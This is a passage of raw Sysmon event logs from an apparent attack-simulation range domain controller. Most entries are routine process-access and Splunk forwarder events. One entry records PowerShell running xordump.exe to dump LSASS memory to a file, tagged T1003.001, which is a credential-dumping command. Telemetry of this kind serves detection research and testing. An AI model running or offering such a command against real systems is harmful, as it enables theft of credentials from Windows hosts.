ssembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System
.Management.Automation.ni.dll+9c5a809f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c60bb11(wow64) 154100x800000000000000026103Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.282{4DB9351A-A347-60D3-6806-00000000CF01}2932C:\Windows\Temp\xordump.exe-----"C:\Windows\Temp\xordump.exe" -out C:\Windows\Temp\lsass-xordump.t1003.001.dmp -x 0x41C:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=2887E395989FF904B70306D49EED5737,SHA256=6B37390CC4C1D730CE2622386C6F4E0B7947A3E86016497C2700931499DC2647,IMPHASH=4035D2883E01D64F3E7A9DCCB1D63AF5{4DB9351A-A347-60D3-6706-00000000CF01}5864C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\Windows\Temp\xordump.exe -out C:\Windows\Temp\lsass-xordump.t1003.001.dmp -x 0x41} 10341000x800000000000000026102Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.254{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A347-60D3-6706-00000000CF01}5864C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026101Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026141Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026140Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026139Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026138Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026137Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026136Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026135Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026134Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026133Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026132Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026131Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026130Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026129Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026128Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026127Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026126Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026125Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F32-60D3-D100-00000000CF01}100C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026124Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F32-60D3-D100-00000000CF01}100C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000026123Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.276{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D3F8BE17EBD2C1221D5735C77D0EB49,SHA256=A14E98791F8D45D9639BBC4D65B1955791BC8A7404EFDB76CD3904D4BCD08FA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000026166Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:36.340{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EB822047F8BAB4E526F8737C18C7402,SHA256=78D93DB45752ED378E980F604B84E24B7E815D768E2BA46809780FF81EBD5159,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000026167Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:37.356{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FF2520CDD8C26A9DF795053FF328206,SHA256=B0C07C029DB19AF26F31E29496D682A5B703A9689C1967485E1AE31501370C2A,IMPHASH=00000000000000000000000000000000falsetrue